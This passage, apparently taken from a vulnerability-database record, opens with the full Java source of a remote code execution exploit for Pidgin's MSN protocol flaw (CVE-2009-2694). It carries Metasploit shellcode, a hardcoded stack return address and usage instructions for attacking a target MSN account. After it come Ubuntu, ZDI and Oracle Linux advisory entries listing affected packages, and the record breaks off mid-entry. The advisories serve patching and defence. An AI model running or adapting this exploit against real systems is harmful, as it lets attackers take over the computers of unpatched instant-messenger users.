Instant Messenger. \n* \n* This is an exploit for the vulnerability[1] discovered in Pidgin by core-security[2]. \n* The library \"libmsn\" used by pidgin doesn't handle specially crafted MsnSlp packets \n* which could lead to memory corruption. \n* \n* Affected versions : \n* Pidgin <= 2.5.8, Adium and other IM using Pidgin-libpurple/libmsn library. \n* \n* Plateforms : \n* Windows, Linux, Mac \n* \n* Fix : \n* Fixed in Pidgin 2.5.9 \n* Update to the latest version : http://www.pidgin.im/download/ \n* \n* References : \n* [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694 \n* [2] http://www.coresecurity.com/content/libpurple-arbitrary-write \n* [3] http://www.pidgin.im/news/security/?id=34 \n* \n* Usage : \n* You need the Java MSN Messenger library : http://sourceforge.net/projects/java-jml/ \n* javac.exe -cp \"%classpath%;.\\jml-1.0b3-full.jar\" PidginExploit.java \n* java -cp \"%classpath%;.\\jml-1.0b3-full.jar\" PdiginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL \n* \n*/ \n \nimport net.sf.jml.*; \nimport net.sf.jml.event.*; \nimport net.sf.jml.impl.*; \nimport net.sf.jml.message.p2p.*; \nimport net.sf.jml.util.*; \n \npublic class PidginExploit { \n \nprivate MsnMessenger messenger; \nprivate String login; \nprivate String password; \nprivate String target; \n \nprivate int session_id = NumberUtils.getIntRandom(); \n \nprivate byte shellcode[] = new byte[] { \n \n/* \n* if you use the stack in your shellcode do not forgot to change esp because eip == esp == kaboom ! \n* sub esp,500 \n*/ \n(byte) 0x81, (byte) 0xEC, (byte) 0x00, (byte) 0x05, (byte) 0x00, (byte) 0x00, \n \n \n/* \n* windows/exec - 121 bytes \n* http://www.metasploit.com \n* EXITFUNC=process, CMD=calc.exe \n*/ \n(byte) 0xfc, (byte) 0xe8, (byte) 0x44, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x8b, (byte) 0x45, \n(byte) 0x3c, (byte) 0x8b, (byte) 0x7c, (byte) 0x05, (byte) 0x78, (byte) 0x01, (byte) 0xef, (byte) 0x8b, \n(byte) 0x4f, (byte) 0x18, (byte) 0x8b, (byte) 0x5f, (byte) 0x20, (byte) 0x01, (byte) 0xeb, (byte) 0x49, \n(byte) 0x8b, (byte) 0x34, (byte) 0x8b, (byte) 0x01, (byte) 0xee, (byte) 0x31, (byte) 0xc0, (byte) 0x99, \n(byte) 0xac, (byte) 0x84, (byte) 0xc0, (byte) 0x74, (byte) 0x07, (byte) 0xc1, (byte) 0xca, (byte) 0x0d, \n(byte) 0x01, (byte) 0xc2, (byte) 0xeb, (byte) 0xf4, (byte) 0x3b, (byte) 0x54, (byte) 0x24, (byte) 0x04, \n(byte) 0x75, (byte) 0xe5, (byte) 0x8b, (byte) 0x5f, (byte) 0x24, (byte) 0x01, (byte) 0xeb, (byte) 0x66, \n(byte) 0x8b, (byte) 0x0c, (byte) 0x4b, (byte) 0x8b, (byte) 0x5f, (byte) 0x1c, (byte) 0x01, (byte) 0xeb, \n(byte) 0x8b, (byte) 0x1c, (byte) 0x8b, (byte) 0x01, (byte) 0xeb, (byte) 0x89, (byte) 0x5c, (byte) 0x24, \n(byte) 0x04, (byte) 0xc3, (byte) 0x5f, (byte) 0x31, (byte) 0xf6, (byte) 0x60, (byte) 0x56, (byte) 0x64, \n(byte) 0x8b, (byte) 0x46, (byte) 0x30, (byte) 0x8b, (byte) 0x40, (byte) 0x0c, (byte) 0x8b, (byte) 0x70, \n(byte) 0x1c, (byte) 0xad, (byte) 0x8b, (byte) 0x68, (byte) 0x08, (byte) 0x89, (byte) 0xf8, (byte) 0x83, \n(byte) 0xc0, (byte) 0x6a, (byte) 0x50, (byte) 0x68, (byte) 0x7e, (byte) 0xd8, (byte) 0xe2, (byte) 0x73, \n(byte) 0x68, (byte) 0x98, (byte) 0xfe, (byte) 0x8a, (byte) 0x0e, (byte) 0x57, (byte) 0xff, (byte) 0xe7, \n(byte) 0x63, (byte) 0x61, (byte) 0x6c, (byte) 0x63, (byte) 0x2e, (byte) 0x65, (byte) 0x78, (byte) 0x65, \n(byte) 0x00 \n}; \n \n// reteip = pointer to the return address in the stack \n// The shellcode will be wrote just before reteip \n// and reteip will automaticly point to the shellcode. It's magic ! \nprivate int reteip = 0x0022CFCC; //stack on XP SP3-FR Pidgin 2.5.8 \n \nprivate int neweip; \nprivate byte[] payload = new byte[shellcode.length + 4]; \nprivate int totallength = reteip + 4; \n \npublic static void main(String[] args) throws Exception { \n \nif(args.length != 3){ \nSystem.out.println(\"PidginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL\"); \n}else{ \nPidginExploit exploit = new PidginExploit(args[0],args[1],args[2]); \nexploit.start(); \n} \n \n} \n \npublic PidginExploit(String login, String password, String target){ \nthis.login = login; \nthis.password = password; \nthis.target = target; \n \nneweip = reteip - shellcode.length ; \n \nfor(int i=0;i<shellcode.length;i++) \npayload[i] = shellcode[i]; \n \npayload[shellcode.length] = (byte)(neweip & 0x000000FF); \npayload[shellcode.length + 1] = (byte)((neweip & 0x0000FF00) >> 8); \npayload[shellcode.length + 2] = (byte)((neweip & 0x00FF0000) >> 16); \npayload[shellcode.length + 3] = (byte)((neweip & 0xFF000000) >> 24); \n} \n \npublic void start() { \nmessenger = MsnMessengerFactory.createMsnMessenger(login,password); \nmessenger.getOwner().setInitStatus(MsnUserStatus.ONLINE); \n \nmessenger.setLogIncoming(false); \nmessenger.setLogOutgoing(false); \n \ninitMessenger(messenger); \nmessenger.login(); \n} \n \nprotected void initMessenger(MsnMessenger messenger) { \n \nmessenger.addContactListListener(new MsnContactListAdapter() { \n \npublic void contactListInitCompleted(MsnMessenger messenger) { \n \nfinal Object id = new Object(); \n \nmessenger.addSwitchboardListener(new MsnSwitchboardAdapter() { \n \npublic void switchboardStarted(MsnSwitchboard switchboard) { \n \nif (id != switchboard.getAttachment()) \nreturn; \n \nswitchboard.inviteContact(Email.parseStr(target)); \n} \n \npublic void contactJoinSwitchboard(MsnSwitchboard switchboard, MsnContact contact) { \nif (id != switchboard.getAttachment()) \nreturn; \n \nMsnP2PSlpMessage msg = new MsnP2PSlpMessage(); \nmsg.setIdentifier(NumberUtils.getIntRandom()); \nmsg.setSessionId(session_id); \nmsg.setOffset(0); \nmsg.setTotalLength(totallength); \nmsg.setCurrentLength(totallength); \n \n// This flag create a bogus MsnSlpPacket in pidgin memory with a buffer pointing to null \n// We'll use this buffer to rewrite memory in the stack \nmsg.setFlag(0x1000020); \n \nmsg.setP2PDest(target); \n \nswitchboard.sendMessage(msg); \n \nSystem.out.println(\"First packet sent, waiting for the ACK\"); \n \n} \n \npublic void switchboardClosed(MsnSwitchboard switchboard) { \nSystem.out.println(\"switchboardClosed\"); \nswitchboard.getMessenger().removeSwitchboardListener(this); \n} \n \npublic void contactLeaveSwitchboard(MsnSwitchboard switchboard, MsnContact contact){ \nSystem.out.println(\"contactLeaveSwitchboard\"); \n} \n}); \nmessenger.newSwitchboard(id); \n} \n}); \n \nmessenger.addMessageListener(new MsnMessageAdapter(){ \n \npublic void p2pMessageReceived(MsnSwitchboard switchboard,MsnP2PMessage message,MsnContact contact) { \n \n//We receive the ACK of our first packet with the ID of the new bogus packet \nmessage.getIdentifier(); \n \nMsnP2PDataMessage msg = new MsnP2PDataMessage(session_id, message.getIdentifier(), neweip, \npayload.length, payload, target); \n \nswitchboard.sendMessage(msg); \nSystem.out.println(\"ACK received && Payload sent !\"); \nSystem.out.println(\"Exploit OK ! CTRL+C to quit\"); \n \n} \n}); \n \n \n \nmessenger.addMessengerListener(new MsnMessengerAdapter() { \n \npublic void loginCompleted(MsnMessenger messenger) { \nSystem.out.println(messenger.getOwner().getEmail() + \" login\"); \n} \n \npublic void logout(MsnMessenger messenger) { \nSystem.out.println(messenger.getOwner().getEmail() + \" logout\"); \n} \n \npublic void exceptionCaught(MsnMessenger messenger, \nThrowable throwable) { \nSystem.out.println(\"caught exception: \" + throwable); \n} \n}); \n \n} \n} \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/81096/pidginmsn-exec.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:08:37", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2009-2694"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "9.04", "packageVersion": "1:2.5.5-1ubuntu8.4", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "pidgin", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "1:2.4.1-1ubuntu2.6", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "pidgin", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.10", "packageVersion": "1:2.5.2-0ubuntu1.4", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "pidgin", "operator": "lt"}], "description": "Federico Muttis discovered that Pidgin did not properly handle certain malformed messages in the MSN protocol handler. A remote attacker could send a specially crafted message and possibly execute arbitrary code with user privileges.", "edition": 3, "reporter": "Ubuntu", "published": "2009-08-20T00:00:00", "title": "Pidgin vulnerability", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-2694"], "modified": "2009-08-20T00:00:00", "id": "USN-820-1", "href": "https://usn.ubuntu.com/820-1/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:09:26", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2009-1373", "https://usn.ubuntu.com/usn/usn-781-1", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-1376"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "1:1.5.0+1.5.1cvs20051015-1ubuntu10.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "gaim", "operator": "lt"}], "description": "It was discovered that Gaim did not properly handle certain malformed messages when sending a file using the XMPP protocol handler. If a user were tricked into sending a file, a remote attacker could send a specially crafted response and cause Gaim to crash, or possibly execute arbitrary code with user privileges. (CVE-2009-1373)\n\nIt was discovered that Gaim did not properly handle certain malformed messages in the MSN protocol handler. A remote attacker could send a specially crafted message and possibly execute arbitrary code with user privileges. (CVE-2009-1376)", "edition": 3, "reporter": "Ubuntu", "published": "2009-06-03T00:00:00", "title": "Gaim vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-1376", "CVE-2009-1373"], "modified": "2009-06-03T00:00:00", "id": "USN-781-2", "href": "https://usn.ubuntu.com/781-2/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:10:12", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2009-1373", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-1374", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-1376", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-1375"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "9.04", "packageVersion": "1:2.5.5-1ubuntu8.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "pidgin", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "1:2.4.1-1ubuntu2.4", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "pidgin", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.10", "packageVersion": "1:2.5.2-0ubuntu1.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "pidgin", "operator": "lt"}], "description": "It was discovered that Pidgin did not properly handle certain malformed messages when sending a file using the XMPP protocol handler. If a user were tricked into sending a file, a remote attacker could send a specially crafted response and cause Pidgin to crash, or possibly execute arbitrary code with user privileges. (CVE-2009-1373)\n\nIt was discovered that Pidgin did not properly handle certain malformed messages in the QQ protocol handler. A remote attacker could send a specially crafted message and cause Pidgin to crash. This issue only affected Ubuntu 8.10 and 9.04. (CVE-2009-1374)\n\nIt was discovered that Pidgin did not properly handle certain malformed messages in the XMPP and Sametime protocol handlers. A remote attacker could send a specially crafted message and cause Pidgin to crash. (CVE-2009-1375)\n\nIt was discovered that Pidgin did not properly handle certain malformed messages in the MSN protocol handler. A remote attacker could send a specially crafted message and possibly execute arbitrary code with user privileges. (CVE-2009-1376)", "edition": 3, "reporter": "Ubuntu", "published": "2009-06-03T00:00:00", "title": "Pidgin vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "modified": "2009-06-03T00:00:00", "id": "USN-781-1", "href": "https://usn.ubuntu.com/781-1/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:10:29", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2009-3085", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-2703", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-0013", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-3615", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-1376", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-2955", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-3083", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-3026"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "8.10", "packageVersion": "1:2.5.2-0ubuntu1.6", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "pidgin", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.04", "packageVersion": "1:2.5.5-1ubuntu8.5", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "pidgin", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "1:2.4.1-1ubuntu2.8", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "pidgin", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.10", "packageVersion": "1:2.6.2-1ubuntu7.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "pidgin", "operator": "lt"}], "description": "It was discovered that Pidgin did not properly handle certain topic messages in the IRC protocol handler. If a user were tricked into connecting to a malicious IRC server, an attacker could cause Pidgin to crash, leading to a denial of service. This issue only affected Ubuntu 8.04 LTS, Ubuntu 8.10 and Ubuntu 9.04. (CVE-2009-2703)\n\nIt was discovered that Pidgin did not properly enforce the \u201crequire TLS/SSL\u201d setting when connecting to certain older Jabber servers. If a remote attacker were able to perform a man-in-the-middle attack, this flaw could be exploited to view sensitive information. This issue only affected Ubuntu 8.04 LTS, Ubuntu 8.10 and Ubuntu 9.04. (CVE-2009-3026)\n\nIt was discovered that Pidgin did not properly handle certain SLP invite messages in the MSN protocol handler. A remote attacker could send a specially crafted invite message and cause Pidgin to crash, leading to a denial of service. This issue only affected Ubuntu 8.04 LTS, Ubuntu 8.10 and Ubuntu 9.04. (CVE-2009-3083)\n\nIt was discovered that Pidgin did not properly handle certain errors in the XMPP protocol handler. A remote attacker could send a specially crafted message and cause Pidgin to crash, leading to a denial of service. This issue only affected Ubuntu 8.10 and Ubuntu 9.04. (CVE-2009-3085)\n\nIt was discovered that Pidgin did not properly handle malformed contact-list data in the OSCAR protocol handler. A remote attacker could send specially crafted contact-list data and cause Pidgin to crash, leading to a denial of service. (CVE-2009-3615)\n\nIt was discovered that Pidgin did not properly handle custom smiley requests in the MSN protocol handler. A remote attacker could send a specially crafted filename in a custom smiley request and obtain arbitrary files via directory traversal. This issue only affected Ubuntu 8.10, Ubuntu 9.04 and Ubuntu 9.10. (CVE-2010-0013)\n\nPidgin for Ubuntu 8.04 LTS was also updated to fix connection issues with the MSN protocol.\n\nUSN-675-1 and USN-781-1 provided updated Pidgin packages to fix multiple security vulnerabilities in Ubuntu 8.04 LTS. The security patches to fix CVE-2008-2955 and CVE-2009-1376 were incomplete. This update corrects the problem. Original advisory details:\n\nIt was discovered that Pidgin did not properly handle file transfers containing a long filename and special characters in the MSN protocol handler. A remote attacker could send a specially crafted filename in a file transfer request and cause Pidgin to crash, leading to a denial of service. (CVE-2008-2955)\n\nIt was discovered that Pidgin did not properly handle certain malformed messages in the MSN protocol handler. A remote attacker could send a specially crafted message and possibly execute arbitrary code with user privileges. (CVE-2009-1376)", "edition": 3, "reporter": "Ubuntu", "published": "2010-01-18T00:00:00", "title": "Pidgin vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-3085", "CVE-2009-3083", "CVE-2009-1376", "CVE-2009-3026", "CVE-2010-0013", "CVE-2009-2703", "CVE-2009-3615", "CVE-2008-2955"], "modified": "2010-01-18T00:00:00", "id": "USN-886-1", "href": "https://usn.ubuntu.com/886-1/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdi": [{"lastseen": "2016-11-09T00:18:07", "references": ["http://pidgin.im/news/security/?id=32"], "edition": 2, "description": "This vulnerability allows remote attackers to execute arbitrary code on systems with vulnerable installations of messaging applications that make use of the libpurple library. User interaction is not required to exploit this vulnerability.\n\nThe specific flaw exists in the implementation of the MSN protocol, specifically the handling of SLP messages. The function msn_slplink_process_msg() fails to properly validate an offset value specified in the SLP packet. By providing a specific value, an attacker can overflow a heap buffer resulting in arbitrary code execution.", "reporter": "Loic VALBON", "published": "2009-06-08T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Multiple Vendor libpurple MSN Protocol SLP Message Heap Overflow Vulnerability", "type": "zdi", "bulletinFamily": "info", "cvelist": ["CVE-2009-1376"], "modified": "2009-11-09T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-09-031", "id": "ZDI-09-031", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oraclelinux": [{"lastseen": "2018-08-31T01:48:30", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "ia64", "packageFilename": "libpurple-devel-2.5.9-1.el4.ia64.rpm", "packageName": "libpurple-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "x86_64", "packageFilename": "pidgin-devel-2.5.9-1.el4.x86_64.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "i386", "packageFilename": "pidgin-perl-2.5.9-1.el4.i386.rpm", "packageName": "pidgin-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "i386", "packageFilename": "libpurple-tcl-2.5.9-1.el4.i386.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "x86_64", "packageFilename": "finch-2.5.9-1.el4.x86_64.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "i386", "packageFilename": "finch-2.5.9-1.el4.i386.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "ia64", "packageFilename": "libpurple-tcl-2.5.9-1.el4.ia64.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "x86_64", "packageFilename": "libpurple-devel-2.5.9-1.el4.x86_64.rpm", "packageName": "libpurple-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "ia64", "packageFilename": "libpurple-perl-2.5.9-1.el4.ia64.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.5.1-4.el3", "arch": "x86_64", "packageFilename": "pidgin-1.5.1-4.el3.x86_64.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "i386", "packageFilename": "libpurple-devel-2.5.9-1.el4.i386.rpm", "packageName": "libpurple-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.5.1-4.el3", "arch": "i386", "packageFilename": "pidgin-1.5.1-4.el3.i386.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.5.1-4.el3", "arch": "src", "packageFilename": "pidgin-1.5.1-4.el3.src.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.5.1-4.el3", "arch": "src", "packageFilename": "pidgin-1.5.1-4.el3.src.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "i386", "packageFilename": "libpurple-2.5.9-1.el4.i386.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "x86_64", "packageFilename": "libpurple-perl-2.5.9-1.el4.x86_64.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "ia64", "packageFilename": "finch-2.5.9-1.el4.ia64.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "x86_64", "packageFilename": "pidgin-2.5.9-1.el4.x86_64.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "x86_64", "packageFilename": "finch-devel-2.5.9-1.el4.x86_64.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "i386", "packageFilename": "pidgin-2.5.9-1.el4.i386.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "ia64", "packageFilename": "finch-devel-2.5.9-1.el4.ia64.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "x86_64", "packageFilename": "libpurple-2.5.9-1.el4.x86_64.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "i386", "packageFilename": "pidgin-devel-2.5.9-1.el4.i386.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "ia64", "packageFilename": "libpurple-2.5.9-1.el4.ia64.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "ia64", "packageFilename": "pidgin-2.5.9-1.el4.ia64.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "i386", "packageFilename": "libpurple-perl-2.5.9-1.el4.i386.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "ia64", "packageFilename": "pidgin-perl-2.5.9-1.el4.ia64.rpm", "packageName": "pidgin-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "x86_64", "packageFilename": "libpurple-tcl-2.5.9-1.el4.x86_64.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "src", "packageFilename": "pidgin-2.5.9-1.el4.src.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "src", "packageFilename": "pidgin-2.5.9-1.el4.src.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "src", "packageFilename": "pidgin-2.5.9-1.el4.src.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "ia64", "packageFilename": "pidgin-devel-2.5.9-1.el4.ia64.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "x86_64", "packageFilename": "pidgin-perl-2.5.9-1.el4.x86_64.rpm", "packageName": "pidgin-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.9-1.el4", "arch": "i386", "packageFilename": "finch-devel-2.5.9-1.el4.i386.rpm", "packageName": "finch-devel", "operator": "lt"}], "description": " \n[2.5.9-1]\r\n- CVE-2009-2694 ", "edition": 3, "reporter": "Oracle", "published": "2009-08-18T00:00:00", "title": "pidgin security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-2694"], "modified": "2009-08-18T00:00:00", "id": "ELSA-2009-1218", "href": "http://linux.oracle.com/errata/ELSA-2009-1218.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:41:08", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.5.1-3.el3", "arch": "x86_64", "packageFilename": "pidgin-1.5.1-3.el3.x86_64.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.5.1-3.el3", "arch": "i386", "packageFilename": "pidgin-1.5.1-3.el3.i386.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.5.1-3.el3", "arch": "src", "packageFilename": "pidgin-1.5.1-3.el3.src.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.5.1-3.el3", "arch": "src", "packageFilename": "pidgin-1.5.1-3.el3.src.rpm", "packageName": "pidgin", "operator": "lt"}], "description": "[1.5.1-3]\n- CVE-2009-1373\n- CVE-2009-1376 ", "edition": 3, "reporter": "Oracle", "published": "2009-05-22T00:00:00", "title": "pidgin security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-1376", "CVE-2009-1373"], "modified": "2009-05-22T00:00:00", "id": "ELSA-2009-1059", "href": "http://linux.oracle.com/errata/ELSA-2009-1059.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:38:54", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "ia64", "packageFilename": "libpurple-tcl-2.5.5-2.el4.ia64.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "ia64", "packageFilename": "finch-2.5.5-2.el4.ia64.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "x86_64", "packageFilename": "pidgin-devel-2.5.5-2.el4.x86_64.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "i386", "packageFilename": "libpurple-devel-2.5.5-2.el4.i386.rpm", "packageName": "libpurple-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "x86_64", "packageFilename": "libpurple-tcl-2.5.5-2.el4.x86_64.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "ia64", "packageFilename": "libpurple-perl-2.5.5-2.el4.ia64.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "ia64", "packageFilename": "pidgin-2.5.5-2.el4.ia64.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "ia64", "packageFilename": "finch-devel-2.5.5-2.el4.ia64.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": 